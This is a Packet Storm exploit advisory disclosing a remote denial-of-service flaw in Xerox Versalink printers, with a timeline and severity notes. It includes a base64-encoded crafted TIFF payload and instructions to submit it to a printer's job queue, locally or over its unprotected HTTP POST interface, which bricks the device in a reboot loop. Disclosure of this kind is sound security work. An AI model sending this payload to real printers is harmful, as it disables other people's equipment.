what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Xerox Versalink Denial Of Service

Xerox Versalink Denial Of Service
Posted Jan 25, 2022
Authored by Mahmoud Al-Qudsi

Xerox Versalink printers suffer from a remote denial of service vulnerability using a specially crafted TIFF payload.

tags | exploit, remote, denial of service
SHA-256 | c5ca25038e516f362471c55d2acef950d200acca71cb6d5265ab1c2ea3227c3b

Xerox Versalink Denial Of Service

Change Mirror Download
[+] Credits: Mahmoud Al-Qudsi
[+] Website: https://neosmart.net/
[+] Source: https://neosmart.net/blog/?p=4865
[+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart

[Vendor]
Xerox Corporation

[Product]
Xerox Versalink printers, other Xerox printers/copiers.

[Vulnerability Type]
Remote denial-of-service leading to bricked device.

[Security Issue]
A specifically crafted TIFF payload may be submitted to the printer's job queue
(in person or over the network) by unauthenticated/unprivileged users or network
or internet attackers by means of a JavaScript payload. The device will panic
upon attempting to read the submitted file and a physical reboot will be
required. Upon reboot, the device will attempt to resume the last-printed job,
triggering the panic once more. The process repeats ad-infinitum.

[Exploit/PoC]
Extract the TIFF contents of the base64-encode archive below and submit directly
to the job queue on a vulnerable printer to trigger the exploit:

UmFyIRoHAQAzkrXlCgEFBgAFAQGAgAD5BbdHEwMC5QAE5QAA9kPUNIAAAANDTVRYZXJveCByZW1v
dGUgYnJpY2sgcGF5bG9hZCBieSBNYWhtb3VkIEFsLVF1ZHNpDQpTZWUgaHR0cHM6Ly9uZW9zbWFy
dC5uZXQvYmxvZy8/cD00ODY1IGZvciBtb3JlIGluZm8uAOsG2ysrAgMLjQEEvAMgCd+uuYADAA94
ZXJveCBicmljay50aWYKAwIA/Fsg4nPVAcISiiBENSb2YDSTz9+g+ofkEQVoaUFeJvK3kDY8WbGp
HgjY0bFPe8gzgjwjaJNmzSGzlGGm0ZRkySYEISicQttsKElCEti8EbSsdkcDz6/WmRz/N1o/EIEf
YPQUn+fPO4RLXjWeRbJT8isQTI5AnW6pF0WsD5DaxM4tgNHp3U7xR1fsHuvMYwMeDGyHIB13VlED
BQQA

[Network Access]
Local or remote

The sample payload may also be submitted to exploit a Xerox printer with a known
ip address or host name over the web by taking advantage of the unprotected HTTP
POST interface exposed by the device on its network interface.

[Severity]
Critical

The denial-of-service attack results in a semi-permanent "bricking" of the Xerox
printer. Recovery may be possible if there are unapplied firmware updates by
forcing an update over the network, which clears the job queue in the process.
Otherwise, manually clearing the non-volatile storage memory on the device's
mainboard is required to break out of the loop.

[Disclosure Timeline]
- September 26, 2019: Reported to Xerox
- January 14, 2020: Confirmed by Xerox in response to a request for updates
- January 25, 2022: Publicly disclosed, remains unpatched and exploitable

Mahmoud



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close